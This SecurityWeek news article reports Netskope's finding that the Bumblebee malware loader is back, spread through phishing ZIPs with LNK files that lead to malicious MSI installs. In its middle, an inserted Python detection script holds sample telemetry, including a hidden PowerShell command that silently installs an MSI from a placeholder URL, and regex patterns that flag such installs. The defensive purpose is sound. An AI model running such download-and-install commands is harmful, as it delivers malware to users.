Bumblebee Malware Loader Resurfaces Following Law Enforcement Takedown

New malicious campaign suggests the Bumblebee malware loader might be resurfacing following the May 2024 law enforcement takedown.

The sophisticated malware loader Bumblebee appears to have resurfaced after a May 2024 law enforcement operation disrupted its infrastructure, cybersecurity firm Netskope reports.

The takedown, referred to as Operation Endgame, targeted Bumblebee, IcedID, Pikabot, Smokeloader, SystemBC, and Trickbot, and resulted in asset freezes, infrastructure shutdowns, and the identities of eight suspects being made public.

First discovered in March 2022 and mainly used for payload delivery, Bumblebee disappeared from the threat landscape after the disruption, but Netskope has uncovered a new infection chain that results in the loader’s deployment.

The malware downloader appears to be distributed via phishing emails luring the recipients into opening an attached ZIP archive and executing its content.

“The ZIP file contains an LNK file named ‘Report-41952.lnk’ that, once executed, starts a chain of events to download and execute the final Bumblebee payload in memory, avoiding the need to write the DLL on disk, as observed in previous campaigns,” Netskope explains.

Bumblebee’s operators are known for their use of LNK files for payload download and file execution, and the newly observed attacks are no different: the LNK file executes a PowerShell command to fetch an MSI file from a remote server and install it using msiexec.exe.

User interaction is only required for running the LNK file, while the rest of the infection chain is executed automatically. The MSI files dropping the Bumblebee payload pose as Nvidia and Midjourney installers.

While previous attacks relied on legitimate binaries such as rundll32.exe and regsvr32.exe for loading malicious DLL files, the newly observed Bumblebee infection chain uses a stealthier technique, employing the SelfReg table for DLL execution.
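The chain described above (a user-launched LNK that spawns PowerShell, which in turn runs msiexec.exe against a package fetched from a remote server) leaves a recognizable parent/child pattern in process-creation telemetry. The following is an added detection example, not code from Netskope or SecurityWeek; it runs over a handful of constructed event records shaped like Sysmon Event ID 1 fields (pid, parent pid, image, command line) and scores each msiexec.exe launch on three signals: a scripting-host parent, a remote package source, and a silent-install switch. The URL, paths, and pids in the sample are made up.

```python
"""Toy detection for an LNK -> PowerShell -> msiexec installation chain.

Added example (not from the article or from Netskope). Event records are
constructed to resemble Sysmon Event ID 1 (process creation) fields.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed sample telemetry (hypothetical hosts, paths, and URL).
SAMPLE_EVENTS = [
    ProcEvent(1000, 900, r"C:\Windows\explorer.exe", "explorer.exe"),
    # Explorer runs the LNK, which launches a hidden PowerShell that calls msiexec.
    ProcEvent(1010, 1000,
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell.exe -w hidden -c "msiexec /i http://example.invalid/setup.msi /qn"'),
    ProcEvent(1020, 1010, r"C:\Windows\System32\msiexec.exe",
              "msiexec.exe /i http://example.invalid/setup.msi /qn"),
    # Benign: a user double-clicks a locally downloaded installer.
    ProcEvent(2000, 1000, r"C:\Windows\System32\msiexec.exe",
              r'msiexec.exe /i "C:\Users\user\Downloads\VLC.msi"'),
    # Benign: an admin script that never touches msiexec.
    ProcEvent(3000, 1000,
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -NoProfile -File C:\scripts\inventory.ps1"),
]

# Package source given as a URL (msiexec can install straight from one).
REMOTE_SRC = re.compile(r"\b(?:https?|ftp)://", re.IGNORECASE)
# Silent / no-UI switches: /q, /qn, /qb, /quiet.
QUIET = re.compile(r"(?:^|\s)/q(?:n|b|uiet)?\b", re.IGNORECASE)
# Interpreters that an LNK or macro typically hands off to.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}


def basename(image: str) -> str:
    """Return the lower-cased file name of a Windows image path."""
    return image.rsplit("\\", 1)[-1].lower()


def find_suspicious_msiexec(events, min_reasons: int = 2):
    """Return [(pid, [reasons])] for msiexec launches matching >= min_reasons signals."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        if basename(e.image) != "msiexec.exe":
            continue
        reasons = []
        parent = by_pid.get(e.ppid)
        if parent is not None and basename(parent.image) in SCRIPT_HOSTS:
            reasons.append(f"parent is {basename(parent.image)}")
        if REMOTE_SRC.search(e.cmdline):
            reasons.append("package fetched from remote URL")
        if QUIET.search(e.cmdline):
            reasons.append("silent install switch")
        if len(reasons) >= min_reasons:
            hits.append((e.pid, reasons))
    return hits


if __name__ == "__main__":
    for pid, reasons in find_suspicious_msiexec(SAMPLE_EVENTS):
        print(f"msiexec pid {pid}: " + "; ".join(reasons))
```

Requiring two of the three signals keeps a plain double-click on a downloaded installer (parent explorer.exe, local path, interactive UI) out of the results while still flagging the scripted, remote, silent install; the thresholds are a starting point to tune against your own baseline of software-deployment activity.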


“The mentioned DLL is present in a CAB file named ‘disk1’ and once the MSI installation starts, the DLL is loaded in the msiexec process address space and its DllRegisterServer export function is called, leading to the unpacking and execution of the Bumblebee payload,” Netskope explains.

The deployed loader version has the same internal DLL and exported functions as previously observed iterations, as well as the same configuration extraction approach, using a clear-text hardcoded key to decrypt the encrypted configuration.


Written By

Ionut Arghire is an international correspondent for SecurityWeek.
